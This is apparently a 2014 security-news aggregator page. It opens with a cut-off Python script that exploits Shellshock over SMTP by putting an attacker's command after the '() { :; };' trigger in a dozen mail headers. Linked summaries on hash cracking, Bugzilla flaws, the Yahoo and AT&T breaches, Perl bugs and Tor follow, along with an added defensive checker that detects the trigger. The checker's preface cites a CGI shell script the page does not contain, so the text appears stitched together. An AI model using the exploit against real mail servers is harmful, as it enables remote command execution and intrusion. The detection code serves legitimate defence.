if(argc < 3 or argc > 3):
    usage()
    sys.exit(0)

rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]

headers = ([
    "To",
    "References",
    "Cc",
    "Bcc",
    "From",
    "Subject",
    "Date",
    "Message-ID",
    "Comments",
    "Keywords",
    "Resent-Date",
    "Resent-From",
    "Resent-Sender"
    ])

s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))

# banner grab
s.recv(2048*4)

def netFormat(d):
    d += "\n"
    return d.encode('hex').decode('hex')

data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)

data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)

data = netFormat("data")
s.send(data)
s.recv(2048*4)

data = ''
for h in headers:
    data += netFormat(h + ":() { :; };" + cmd)

data += netFormat(cmd)

# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')

s.send(data)
s.recv(2048*4)

data = netFormat("quit")
s.send(data)
s.recv(2048*4)




LM Hash Cracking – Rainbow Tables vs GPU Brute Force

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

Our standard response has been that we don’t need them anymore. I honestly haven’t needed (or heavily used) them for a while now, as our cracking box has been able to crack the majority of the hashes that we throw at it. This got me thinking about what the actual tradeoffs are for using our GPUs to crack LM hashes versus using the more traditional method of Rainbow Tables.

more here...........https://www.netspi.com/blog/entryid/241/lm-hash-cracking-rainbow-tables-vs-gpu-brute-force

Bugzilla Zero-Day Exposes Zero-Day Bugs

A previously unknown security flaw in Bugzilla — a popular online bug-tracking tool used by Mozilla and many of the open source Linux distributions — allows anyone to view detailed reports about unfixed vulnerabilities in a broad swath of software. Bugzilla is expected today to issue a fix for this very serious weakness, which potentially exposes a veritable gold mine of vulnerabilities that would be highly prized by cyber criminals and nation-state actors.


more here..........http://krebsonsecurity.com/2014/10/bugzilla-zero-day-exposes-zero-day-bugs/

Yahoo! Has been HACKED, and all your information with them is now in danger!

All stemming from them not keeping up with technology and failing to patch a world-known vulnerability!

more here...........https://webcache.googleusercontent.com/search?q=cache:I8s8KmZhwXMJ:www.futuresouth.us/yahoo_hacked.html+&cd=1&hl=en&ct=clnk&client=firefox-a

SHELLSHOCK – HANDS-ON

In my previous post I gave an overview of the key events that happened during the week that the GNU Bash vulnerability – Shellshock – got disclosed. In this post I would like to demonstrate a hands-on scenario that will allow one to have a better practical understanding of how someone could exploit the Shellshock vulnerability using HTTP requests to CGI scripts.

more here...........http://countuponsecurity.com/2014/10/06/shellshock-hands-on/
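The two Shellshock scripts on this page (the CGI reverse/bind-shell script and the Postfix SMTP script) and the hands-on write-up linked above all deliver the same trigger: a header value that begins with an exported-function definition, `() { :; };`, followed by the text a vulnerable Bash then runs. As an added example that is not part of any of those posts, the Python 3 checker below parses an SMTP header block or an HTTP request and reports which headers carry the trigger and what follows it. The sample messages are constructed, use `example.test` hosts, and carry a harmless echo in place of a real command.

```python
import re
from typing import Dict, List, Tuple

# Heuristic for the CVE-2014-6271 trigger: an exported-function definition
# "() { :; };" followed by the text the vulnerable shell goes on to execute.
# Whitespace between the tokens is optional so that both spellings used by
# the scripts above ("() { :;};" and "() { :; };") match.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;\s*(?P<tail>.*)")


def parse_header_block(raw: str) -> List[Tuple[str, str]]:
    """Split an SMTP header block or an HTTP request into (name, value) pairs.

    A request line such as "GET /x HTTP/1.1" is skipped, folded continuation
    lines (leading space or tab) are appended to the preceding header, and
    parsing stops at the first blank line, which separates headers from the
    message body in both protocols.
    """
    pairs: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if not line.strip():
            if pairs:                      # blank line after headers: body follows
                break
            continue
        if line[0] in " \t" and pairs:     # folded continuation line
            name, value = pairs[-1]
            pairs[-1] = (name, value + " " + line.strip())
            continue
        name, sep, value = line.partition(":")
        if not sep or " " in name.strip():  # no colon at all, or a request line
            continue
        pairs.append((name.strip(), value.strip()))
    return pairs


def find_shellshock(raw: str) -> List[Dict[str, str]]:
    """Return one record per header whose value carries the trigger, together
    with the text that would be handed to the shell."""
    hits: List[Dict[str, str]] = []
    for name, value in parse_header_block(raw):
        match = SHELLSHOCK_RE.search(value)
        if match:
            hits.append({"header": name, "command": match.group("tail").strip()})
    return hits


# Constructed sample in the shape the SMTP script above produces, with a
# harmless echo standing in for the attacker's command.
SAMPLE_SMTP = "\r\n".join([
    "From: sender@example.test",
    "To:() { :; };/bin/echo probe",
    "Subject:() { :; };/bin/echo probe",
    "Date: Mon, 06 Oct 2014 10:00:00 +0000",
    "",
    "body text",
    ".",
])

# Constructed sample of a CGI request of the kind the HTTP write-ups describe.
SAMPLE_HTTP = "\r\n".join([
    "GET /cgi-bin/test.cgi HTTP/1.1",
    "Host: www.example.test",
    "User-Agent: () { :;}; /bin/echo probe",
    "Accept: */*",
    "",
])

# Constructed benign message: braces in a Subject line, but no trigger.
SAMPLE_CLEAN = "\r\n".join([
    "From: sender@example.test",
    "Subject: function () { return 1; }",
    "",
])

if __name__ == "__main__":
    for label, sample in (("smtp", SAMPLE_SMTP), ("http", SAMPLE_HTTP), ("clean", SAMPLE_CLEAN)):
        print(label, find_shellshock(sample))
```

The header name matters less than the value: the SMTP script sprays the same definition into a dozen headers because it does not know which one the receiving pipeline exports into the environment, so a detector should look at every header rather than a fixed list. The regex is deliberately looser than Bash's own parser, which only acts on values beginning exactly with `() {`; the cost of that looseness is an occasional false positive on header values that legitimately contain `() { :; };`, which in practice do not occur.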

AT&T Hit By Insider Breach- Congress Should Require Credit Issuers to Access Centralized Database of Known Compromised Individuals

AT&T is warning consumers about a data breach involving an insider who illegally accessed the personal information of an unspecified number of users. The compromised data includes Social Security numbers and driver’s license numbers. - See more at: http://threatpost.com/att-hit-by-insider-breach/108705


As we are all aware, the number of identity theft victims continues to rise significantly, and this case is no exception. Even if you have the appropriate countermeasures in place you can still be victimized. Those safeguards may include signing up with an identity theft protection company, placing a fraud alert on your account or even placing a credit freeze. So I ask myself why Congress does not pass a law requiring all credit issuers to access a centralized database of people already known to be compromised. The law should require these credit entities, and even the IRS, to query the database, access verified contact numbers and call these victims before issuing any credit inquiries. Credit issuers who do not perform this query should receive a substantial fine and/or pay damages to those who have been violated. Remember, inquiries in and of themselves, despite a fraud alert, can impact one's credit.

It's also true that many of these protective services are not capable of safeguarding against false IRS refunds. The IRS itself admitted in January of this year that it has seen a significant increase in refund fraud involving identity thieves who file false claims for refunds by stealing and using someone's Social Security number. It goes on to say: "In Fiscal Year (FY) 2013, the IRS initiated approximately 1,492 identity theft related criminal investigations, an increase of 66 percent over investigations initiated in FY 2012. Direct investigative time applied to identity theft related investigations has increased 216 percent over the last two years." (Source link: http://www.irs.gov/uac/Newsroom/IRS-Criminal-Investigation-Combats-Identity-Theft-Refund-Fraud)

The 216 percent increase mentioned above leads me to another point: because of this illegal activity, productivity continues to fall dramatically while the costs to consumers, credit-issuing entities and insurance companies alike rise at a staggering rate. For example, the time it takes for those who have been exploited to clear their good names (even with some sort of protective service in place) has become exorbitant.

So again: Congress, make a move already. Enough is enough!

New Class of Vulnerability in Perl Web Applications

We did a Bugzilla security release today, to fix some holes responsibly disclosed to us by Check Point Vulnerability Research, to whom we are very grateful. The most serious of them would allow someone to create and control an account for an arbitrary email address they don’t own. If your Bugzilla gives group permissions based on someone’s email domain, as some do, this could be a privilege escalation.

These bugs are actually quite interesting, because they seem to represent a new Perl-specific security problem.

more here............http://blog.gerv.net/2014/10/new-class-of-vulnerability-in-perl-web-applications/

Syser + VirtualBox = Win

Recently I’ve had to step into the awful world of kernel debugging. When malware drops a rootkit and conventional userland debugging falls short, you have to step into ring 0. Unfortunately, options are rather limited when it comes to decent ring 0 debugging on Windows.

more here...........http://www.gironsec.com/blog/2014/10/syser-virtualbox-win/

Start-Ups, Information Security, and Budgets

THE 80'S WERE OK, I GUESS
As a child of the 80's, I was raised with a lot of mixed messages. These messages took a lot of bizarre forms. I distinctly remember Poison's "Open Up and Say Ahh" being re-released solely because parental groups were concerned that the devilish cover was somehow hypnotizing teens into a riotous hormonal rage. It surprised me, even at the tender age of nine, that somehow covering up the image except for the eyes would appease these groups that supposedly cared about decency.

more here..........http://blog.securitymouse.com/2014/10/start-ups-information-security-and.html

Paper: Another Tor is possible

The aim of this paper is to introduce some modifications to Tor in order to improve users' anonymity and relays' security. Thus, we introduce a system that will ensure anonymity for all users while maintaining the ability to break the anonymity of a sender in case of misconduct. The revocation of anonymity will require the use of secret sharing schemes, since we assume that the lifting of the anonymity of a dishonest user should not depend on a single entity, but on a consensus within the network. In addition to the revocation of anonymity, we propose in this paper further improvements such as mixing Tor traffic with that of the major internet groups, using camouflage, or introducing a honeypot in the network.

more here.............http://eprint.iacr.org/2014/787.pdf